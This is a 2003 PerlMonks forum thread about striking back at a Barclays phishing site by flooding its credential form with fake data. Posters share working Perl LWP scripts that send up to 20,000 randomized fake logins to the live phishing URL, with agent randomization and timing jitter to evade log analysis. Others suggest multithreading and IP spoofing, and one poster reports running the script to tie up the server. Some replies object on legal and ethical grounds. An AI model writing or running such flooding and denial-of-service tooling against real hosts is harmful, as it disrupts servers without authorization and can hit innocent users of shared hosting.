Re: Enough is Enough - Taking the fight back to the Internet scammers
by sauoq (Abbot) on Oct 28, 2003 at 02:35 UTC
|
I'm not exactly opposed to vigilantism in a case like this but I don't expect it would be very effective. I'm reminded of the little dutch boy plugging a hole in the dike with his finger. It's really far too easy to move to another server, IP, and or domain name.
The only real way to combat this kind of thing is with education.
The random data should be identical to valid data making it impossible to automatically parse out:
I think that's being optimistic. With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.
Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it. They probably don't care as their disclamer makes it THE CLIENTS problem.
I would guess they would care a great deal. The monies in the bank are probably insured against fraud up to some amount. Besides, banks make money by holding onto yours. They don't want to lose their customers' money to someone that will go put it in another bank, right? And, really, they don't want to lose your future business either. I would think that banks take a great deal of interest in this sort of thing.
I suppose I could ask one of my more dubious assocites to take the server down but that would probably hurt inoccent users as well.
I wouldn't worry about the other users. It is likely that there are no legitimate users of the machine or that the hosting provider is at least aware of the illegitmate users. But again, it's simply too easy for the perpetrators to move on, so I don't really see the point (except maybe to feel like you got a little revenge.)
-sauoq
"My two cents aren't worth a dime.";
| [reply] |
|
With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.
Besides the bugs in the code this could be harder than expected. You would need certain elements in the raw data file as well as the 4 significant data fields you might presume the script is writing. A parallel log analysis might show you when you were being bombed and from where but you need to accurately correllate that with the data. A low order continuous DOS would make this problematic anyway as all data would become suspect. The general idea of adding a haystack to hide the needles seems like not a bad approach.
Of course there are plenty of fixes for it but it does require that those fixes get implemented. Given that it appears that this site is a clone of a scam on the National bank it is possible that while the perps are creative they are at a script kiddy level. The form they present looks nowhere near as high quality as some I have seen which are a perfect match for the target site.
As you don't need the return data you would really want to spoof the sending IP address. Better simulated names (ie taken from a real name list) and Secret words taken from say the Unix dictionary would also add more realism.
Education is a nice thought but if you take virus spread as an example some people are difficult to educate.
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
| [reply] |
|
A parallel log analysis might show you when you were being bombed and from where but you need to accurately correllate that with the data.
The assumption being that they don't log both together... and maybe they don't. I would, though, if I were pulling a scam like this. (And, if they aren't this time, they probably will next time.)
As you don't need the return data you would really want to spoof the sending IP address.
That would certainly help.
Education is a nice thought but if you take virus spread as an example some people are difficult to educate.
I agree entirely. Of course, losing one's savings might be a lesson that's hard to forget. Regardless of whether or not education is an effective solution, it is the only real one. Like I said though, I'm not opposed to vigilantism in a case like this; I'm just trying to make a realistic assessment of how effective it would be in the long run. My conclusion remains: "not very."
-sauoq
"My two cents aren't worth a dime.";
| [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by tachyon (Chancellor) on Oct 28, 2003 at 02:20 UTC
|
Interesting concept. Not entirely Perl related but then I guess this is a Meditation.
There is a bug in this line (would have been caught by use strict :-) $wordgo=hm should read $word&go=hm.
my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass
+=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20";
# it should be:
my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass
+=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20";
Also = 20,000 means = 20 void context 000. You probably meant = 20_000 or = 20000
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
| [reply] [d/l] |
|
| [reply] |
|
i might be missing something here but why the hell don't Barclays detected when the referrer is the scammer and display a large warning message on their homepage? my only guess is they don't care.
| [reply] |
|
If Barclays were to post a large prominent warning on their web site then the 97-99% of their electronic banking customers that didn't get this email might get nervous and choose not to use the online service. Leading to a lines at branches. Which is a bad thing.
| [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by TVSET (Chaplain) on Oct 28, 2003 at 02:56 UTC
|
Firstly, as I have already recommended here, you should use Mail::SpamAssassin. This will increase your productivity, and I mean with useful stuff. :)
Secondly, while I agree with your "Don't get mad, get even" statement, I disagree with methodology. I don't think that attacking bad guys will lead you anywhere. I would instead help the good guys. And one of the ways to help good guys is education. Banks (and other organizations) should be properly notified that about bad guys around spoofing their sites and producing all sorts of other dirt. Users should be educated about different techniques of misleading them, such as "@" character in the URL. They should be taught to make sure that they are using secure connection with the properly signed and generated certificate from the appropriate bank.
I beleive that a well educated user is capable of securing himself/herself from a great variety of problems.
Take these 2 cents, they are yours. :)
Update: sauoq is faster then me. :)
| [reply] |
|
I'm slowly getting the feeling that things like SpamAssassin arent enough. Recently Ive been getting several bits of spam that only turn up a 1.2->3.0 on the SA scale, and so still get delivered.. (I bet I get real mail that has a worse count than that..)..
So much so that I'm considering making a list from which I will accept mail, and getting everything else directed to a delete box, where it will be deleted if I dont add the address to my list..
(Hmm,m wonder if anyone has done this already..)
C.
| [reply] |
|
We do Bayesian stats work as part of a different project and have a filter based on that (proprietary I'm afraid) although there is popmail Popfile on sourcforge which is OK.
Bayesian stat analysis is probably one step past Spam Assassin but still has the following inherent problems. These apply to all forms of spam filters. First if the filter is publically available (as it must effectively be to be used) then you can craft spam and test it against the filter(s). Regardless of what they are looking for and how they rate spam messages in the form:
Dear Name
RE: Your recent blah blah blah
Thanks for your enquiry. Blah blah blah. Please take the time to have
+a look at:
http://blah.com/cgi-bin/special_offer?name=Name&code=AGERSDGFTGER
I wish you all the best in your endeavour.
Kind Regards
John Smith
Director
Blah.com
Street Address
Phone Number
Fax Number
Mobile Number
BLAH Making it happen
http://blah.com
foo@blah.com
The information transmitted may be confidential, is intended only for
+the
person to which it is addressed, and may not be reviewed, retransmitte
+d,
disseminated or relied upon by any other persons. If you received this
message in error, please contact the sender and destroy any paper or
electronic copies of this message. Any views expressed in this email
communication are those of the individual sender, except where the
sender specifically states otherwise. Blah does not represent,
warrant or guarantee that the communication is free of errors, virus o
+r
interference.
are statistically next to impossible to pick. The problem with the basic mail protocol is that you can forge headers ie there is no way to validate the sending server. Given this you can more of less craft your emails so they will pass any Spam filter.
Messages like this are the new face of spam. Still spam but crafted to look like a standard valid (perhaps corporate) reply. It will be next to impossible to stop mail in this form.
As a result the challenge response/whitelist passthrough is probably the way it will end up in the medium term. Then of course the spammers will implement respond bots and the cycle will continue.
What is needed is a modification to the underlying protocol so that there is an inbuilt challenge response or security key of some form so that the recipient server can query the supposed sending server to see if it was really the source of the message. If you can do that you can work blacklists of spam servers far more effectively.
cheers
tachyon
s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
| [reply] [d/l] |
|
|
|
|
|
|
(Hmm,m wonder if anyone has done this already..)
Yes, they have. Browse the Email Filters section on freshmeat. If you've got a user account there you should be able to search in that category for "whitelist" (you may be able to do this without an account, it's been a while).
davis
It's not easy to juggle a pregnant wife and a troubled child, but somehow I managed to fit in eight hours of TV a day.
| [reply] |
|
|
|
|
There is one thing I've found that DOES effectively prevent Spam. Mailblocks uses a "verify" technique that works pretty much 100%. There are only two drawbacks: 1) it costs money/yr and 2) while they have ways of letting things like orders through, sometimes you just use your e-mail account and things that are NOT going to reply to their message end up in the pending box so you still have to keep your eye on it. But only sometimes. It has been the only way I've found to effectively combat spam. Maybe one day spammers will get by it, but for now, it works.
| [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by bassplayer (Monsignor) on Oct 28, 2003 at 14:10 UTC
|
I gave this node a ++, because I think it is an interesting discussion, and I hate spammers and scammers as much as the next monk. I do, however, have reservations about whether innocent victims could be affected. This seems to be a clear cut case, but what about the next one? Is analysis by a tech a fair trial? Movies such as 12 Angry Men and especially The Star Chamber portray the point I am trying to make rather well.
| [reply] [d/l] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by IlyaM (Parson) on Oct 28, 2003 at 12:24 UTC
|
Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it.
IIRC pisem.net just provides free web hosting services. I doubt they are related to the scummers in any way other that scummers are abusing their free web hosting services. Given most ISPs are quite responsive to reports about spamers and scummers utilizing their resources I bet most effective way to stop this is it to report to abuse@pisem.net.
| [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by pg (Canon) on Oct 28, 2003 at 02:56 UTC
|
I am wondering why there is a sleep in your while loop.
On the contrary, if you really want to do something like this, start multiple threads, and have them sending together. That's pretty useful, otherwise your connection is idle most of the time.
| [reply] |
|
| [reply] |
|
Not taking sides here. But if you want to make it harder for them to spot it in logs, add some random element (included tachyons fixes as well).
#!/usr/bin/perl
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
my $MAX_SLEEP = 5; # max seconds to sleep
my $DEBUG = 1;
my $LOG_FILL = 20000; # how many entries will we add to the scam log?
while(1) {
my $IE = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)];
my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)];
my $bs = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3);
my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $
++bs)";
$ua->agent( $agent );
$DEBUG && print $agent, $/;
my $user = sprintf "%08d", rand(99999999);
my $pass = sprintf "%05d", rand(99999);
my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)
++3);
my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5);
my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&
+pass=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20";
$DEBUG && print $url, $/;
my $request = HTTP::Request->new( 'GET', $url );
my $response = $ua->request( $request );
$DEBUG && print $response->content;
sleep (int(rand ($MAX_SLEEP))+1);
$LOG_FILL--;
die "Done!\n" if $LOG_FILL == 0;
}
| [reply] [d/l] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by zentara (Archbishop) on Oct 28, 2003 at 16:08 UTC
|
Maybe Perlmonks needs a new category: "DOS-of-the-day", so we can all post scripts to attack our favorite spammers. The one I'm getting now is "You've won the lottery" contact us to collect your "prize". | [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Jaap (Curate) on Oct 28, 2003 at 11:44 UTC
|
Ok i'm running a slightly modified version now (with tachyon's bugfixes, strict and warnings and without the sleep).
I figure i'd try to keep the server busy handling my requests, so there is no time to handle innocent spamreaders' requests. | [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Oct 29, 2003 at 02:33 UTC
|
I won't comment on the possible legal ramifications of this post, because they should be obvious to anyone doing 30 seconds of research. What I will comment on is how completely futile your efforts are. You're sending multiple requests, all they have to do is block every ip with more than 2 form submissions and your efforts become a miniscule DOS attack (which is illegal in your country, oops guess I saved you 30 seconds).
Do it from dial up and they will never be able to track you down either.
Welcome to the Internet my friend. First lesson - you are not anonymous. All that has to be done is contact your ISP with the violation and your identity becomes known to them, and law enforcement agencies.
Way to be a script kiddie.
P.S. I don't understand all the posts in this thread. Am I missing something, or has Perlmonks really slid this far down?
| [reply] |
|
Am I missing something, or has Perlmonks really slid this far down?
Slid so far down as to discuss technical means of subverting internet scam artists intent on stealing bank accounts from unsuspecting grandmothers?
What I will comment on is how completely futile your efforts are.
Got to agree with that... I myself have said as much in this thread.
all they have to do is block every ip with more than 2 form submissions
Not if they hope to get more than one set of credentials from an ISP that uses proxy servers like, for one small example, AOL. And, as tachyon mentioned, IP spoofing might be helpful in that regard.
I won't comment on the possible legal ramifications of this post
So, you would be worried that these thieving scumbags would run to the law and file a grievance alleging you attempted to disrupt their scam to steal bank accounts?
-sauoq
"My two cents aren't worth a dime.";
| [reply] |
|
Vigilante "justice" is not justice. Whether you're talking about DOSing email scams or shooting abortion doctors or unilaterally toppling dictatorial regimes, failing to follow the rule of law is to join your enemies at their level.
Taking the law into your own hands assumes that you alone know what's right and wrong, and that your judgement is infallible. There are appropriate methods to achieve your goals. To remain within society, you must follow the social methods: those which have the proper procedural oversight and just review.
-- [ e d @ h a l l e y . c c ]
| [reply] |
|
|
| [reply] |
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Dec 06, 2003 at 19:42 UTC
|
I'm working on a tool that will handle this type of job. Visit Project Web Form Flooder at http://formflood.sourceforge.net | [reply] |